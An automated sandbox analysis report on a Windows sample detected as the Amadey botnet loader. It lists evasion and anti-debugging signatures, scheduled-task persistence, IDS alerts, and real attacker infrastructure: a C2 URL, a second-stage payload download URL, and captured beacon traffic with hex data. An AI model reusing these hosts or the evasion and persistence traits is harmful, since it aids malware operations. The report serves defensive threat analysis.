Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1502480
MD5:457d9a15d305df62fe34c5076f3cad9d
SHA1:7a068fb1e761874759a89534f39c1eb109367448
SHA256:572d806c0b56d27fe05562301de6a9ed45cda3f36aef2f6e370867d9f3847013
Tags:exe
Infos:

Detection

Amadey
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file overlay found
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7108 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 457D9A15D305DF62FE34C5076F3CAD9D)
    • explorti.exe (PID: 4940 cmdline: "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe" MD5: 457D9A15D305DF62FE34C5076F3CAD9D)
  • explorti.exe (PID: 4856 cmdline: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe MD5: 457D9A15D305DF62FE34C5076F3CAD9D)
  • explorti.exe (PID: 7756 cmdline: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe MD5: 457D9A15D305DF62FE34C5076F3CAD9D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
{"C2 url": ["http://185.215.113.19/Vi9leo/index.php"]}
SourceRuleDescriptionAuthorStrings
00000000.00000002.1702163974.0000000000851000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
    00000002.00000002.1743759400.0000000000A01000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
      00000002.00000003.1702733907.00000000048D0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
        00000000.00000003.1661714987.00000000052A0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
          00000001.00000002.1743489529.0000000000A01000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            1.2.explorti.exe.a00000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              2.2.explorti.exe.a00000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                7.2.explorti.exe.a00000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  0.2.file.exe.850000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                    No Sigma rule has matched
                    Timestamp:2024-09-01T20:07:49.855958+0200
                    SID:2856122
                    Severity:1
                    Source Port:80
                    Destination Port:49737
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-09-01T20:09:06.811186+0200
                    SID:2803305
                    Severity:3
                    Source Port:49738
                    Destination Port:80
                    Protocol:TCP
                    Classtype:Unknown Traffic
                    Timestamp:2024-09-01T20:09:05.654798+0200
                    SID:2856147
                    Severity:1
                    Source Port:49737
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: file.exeAvira: detected
                    Source: http://185.215.113.16/Avira URL Cloud: Label: phishing
                    Source: http://185.215.113.16/steam/random.exeWindowsAvira URL Cloud: Label: phishing
                    Source: http://185.215.113.19/Vi9leo/index.phpAvira URL Cloud: Label: malware
                    Source: http://185.215.113.19/Vi9leo/index.phpQAvira URL Cloud: Label: phishing
                    Source: http://185.215.113.16/steam/random.exetaAvira URL Cloud: Label: phishing
                    Source: http://185.215.113.16/steam/random.exe6522427fAvira URL Cloud: Label: phishing
                    Source: http://185.215.113.19/Vi9leo/index.php6Avira URL Cloud: Label: phishing
                    Source: http://185.215.113.16/steam/random.exeDAvira URL Cloud: Label: phishing
                    Source: http://185.215.113.16/wsAvira URL Cloud: Label: phishing
                    Source: http://185.215.113.16/steam/random.exeAvira URL Cloud: Label: phishing
                    Source: http://185.215.113.16/steam/random.exe00Avira URL Cloud: Label: phishing
                    Source: http://185.215.113.16/ataAvira URL Cloud: Label: phishing
                    Source: http://185.215.113.16/steam/random.exem32Avira URL Cloud: Label: phishing
                    Source: http://185.215.113.16/steam/random.exe5Avira URL Cloud: Label: phishing
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                    Source: explorti.exe.7756.7.memstrminMalware Configuration Extractor: Amadey {"C2 url": ["http://185.215.113.19/Vi9leo/index.php"]}
                    Source: http://185.215.113.19/Vi9leo/index.phpVirustotal: Detection: 24%Perma Link
                    Source: http://185.215.113.19/Vi9leo/index.php6Virustotal: Detection: 18%Perma Link
                    Source: http://185.215.113.16/wsVirustotal: Detection: 18%Perma Link
                    Source: http://185.215.113.16/steam/random.exeVirustotal: Detection: 23%Perma Link
                    Source: http://185.215.113.16/steam/random.exe6522427fVirustotal: Detection: 18%Perma Link
                    Source: http://185.215.113.16/Virustotal: Detection: 19%Perma Link
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeReversingLabs: Detection: 57%
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeVirustotal: Detection: 54%Perma Link
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\1000051000\2c422e6624.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeJoe Sandbox ML: detected
                    Source: file.exeJoe Sandbox ML: detected
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49737 -> 185.215.113.19:80
                    Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.19:80 -> 192.168.2.4:49737
                    Source: Malware configuration extractorIPs: 185.215.113.19
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 01 Sep 2024 18:09:06 GMTContent-Type: application/octet-streamContent-Length: 1826304Last-Modified: Sun, 01 Sep 2024 15:41:45 GMTConnection: keep-aliveETag: "66d48b39-1bde00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b e5 e6 03 f5 b6 e6 03 f5 b6 e6 03 f5 b6 89 75 5e b6 fe 03 f5 b6 89 75 6b b6 eb 03 f5 b6 89 75 5f b6 dc 03 f5 b6 ef 7b 76 b6 e5 03 f5 b6 66 7a f4 b7 e4 03 f5 b6 ef 7b 66 b6 e1 03 f5 b6 e6 03 f4 b6 8d 03 f5 b6 89 75 5a b6 f4 03 f5 b6 89 75 68 b6 e7 03 f5 b6 52 69 63 68 e6 03 f5 b6 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4d 8b c8 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 c8 01 00 00 42 22 00 00 00 00 00 00 a0 69 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 69 00 00 04 00 00 f8 9a 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 f0 23 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 f1 23 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 23 00 00 10 00 00 00 3c 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 e0 23 00 00 00 00 00 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 f0 23 00 00 02 00 00 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 20 2b 00 00 00 24 00 00 02 00 00 00 4e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 67 6f 64 6b 70 65 62 00 70 1a 00 00 20 4f 00 00 68 1a 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 72 67 73 6d 66 71 66 00 10 00 00 00 90 69 00 00 04 00 00 00 b8 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 a0 69 00 00 22 00 00 00 bc 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 37 32 41 37 38 42 31 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7AB72A78B15E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
                    Source: Joe Sandbox ViewIP Address: 185.215.113.19 185.215.113.19
                    Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
                    Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49738 -> 185.215.113.16:80
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 7_2_00A0BD60 InternetOpenW,InternetConnectA,HttpSendRequestA,InternetReadFile,7_2_00A0BD60
                    Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
                    Source: unknownHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: explorti.exe, 00000007.00000002.2896830843.00000000015D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/
                    Source: explorti.exe, 00000007.00000002.2896830843.00000000015D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/ata
                    Source: explorti.exe, 00000007.00000002.2896830843.00000000015F0000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000007.00000002.2896830843.00000000015D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exe
                    Source: explorti.exe, 00000007.00000002.2896830843.00000000015F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exe00
                    Source: explorti.exe, 00000007.00000002.2896830843.00000000015F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exe5
                    Source: explorti.exe, 00000007.00000002.2896830843.00000000015F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exe6522427f
                    Source: explorti.exe, 00000007.00000002.2896830843.00000000015D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exeD
                    Source: explorti.exe, 00000007.00000002.2896830843.00000000015BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exeWindows
                    Source: explorti.exe, 00000007.00000002.2896830843.00000000015BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exem32
                    Source: explorti.exe, 00000007.00000002.2896830843.00000000015BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exeta
                    Source: explorti.exe, 00000007.00000002.2896830843.00000000015D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/ws
                    Source: explorti.exe, 00000007.00000002.2896830843.00000000015BF000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000007.00000002.2896830843.00000000015F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.php
                    Source: explorti.exe, 00000007.00000002.2896830843.00000000015BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.php6
                    Source: explorti.exe, 00000007.00000002.2896830843.00000000015F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.phpQ

                    System Summary

                    barindex
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: .idata
                    Source: file.exeStatic PE information: section name:
                    Source: explorti.exe.0.drStatic PE information: section name:
                    Source: explorti.exe.0.drStatic PE information: section name: .idata
                    Source: explorti.exe.0.drStatic PE information: section name:
                    Source: random[1].exe.7.drStatic PE information: section name:
                    Source: random[1].exe.7.drStatic PE information: section name: .rsrc
                    Source: random[1].exe.7.drStatic PE information: section name: .idata
                    Source: random[1].exe.7.drStatic PE information: section name:
                    Source: 2c422e6624.exe.7.drStatic PE information: section name:
                    Source: 2c422e6624.exe.7.drStatic PE information: section name: .rsrc
                    Source: 2c422e6624.exe.7.drStatic PE information: section name: .idata
                    Source: 2c422e6624.exe.7.drStatic PE information: section name:
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\explorti.jobJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 7_2_00A0E4407_2_00A0E440
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 7_2_00A04CF07_2_00A04CF0
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 7_2_00A430687_2_00A43068
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 7_2_00A37D837_2_00A37D83
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 7_2_00A04AF07_2_00A04AF0
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 7_2_00A4765B7_2_00A4765B
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 7_2_00A42BD07_2_00A42BD0
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 7_2_00A487207_2_00A48720
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 7_2_00A46F097_2_00A46F09
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 7_2_00A4777B7_2_00A4777B
                    Source: random[1].exe.7.drStatic PE information: Data appended to the last section found
                    Source: 2c422e6624.exe.7.drStatic PE information: Data appended to the last section found
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: file.exeStatic PE information: Section: ZLIB complexity 0.9999786543715847
                    Source: file.exeStatic PE information: Section: mlkfqtwe ZLIB complexity 0.9943439640410959
                    Source: explorti.exe.0.drStatic PE information: Section: ZLIB complexity 0.9999786543715847
                    Source: explorti.exe.0.drStatic PE information: Section: mlkfqtwe ZLIB complexity 0.9943439640410959
                    Source: random[1].exe.7.drStatic PE information: Section: agodkpeb ZLIB complexity 0.9952814509812006
                    Source: 2c422e6624.exe.7.drStatic PE information: Section: agodkpeb ZLIB complexity 0.9952814509812006
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/5@0/2
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeFile created: C:\Users\user\AppData\Roaming\1000051000\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: explorti.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: explorti.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: explorti.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: winmm.dllJump to behavior
